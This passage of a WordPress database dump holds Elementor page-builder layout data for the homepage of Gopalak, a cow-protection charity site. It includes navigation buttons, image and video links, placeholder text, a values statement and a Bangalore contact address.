ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9336,1600,'_elementor_page_assets','a:0:{}'),(9401,1602,'_elementor_edit_mode','builder'),(9402,1602,'_elementor_template_type','wp-page'),(9403,1602,'_elementor_version','3.7.8'),(9404,1602,'_wp_page_template','elementor_canvas'),(9405,1602,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9406,1602,'_elementor_page_assets','a:0:{}'),(9408,1603,'_elementor_edit_mode','builder'),(9409,1603,'_elementor_template_type','wp-page'),(9410,1603,'_elementor_version','3.7.8'),(9411,1603,'_wp_page_template','elementor_canvas'),(9412,1603,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"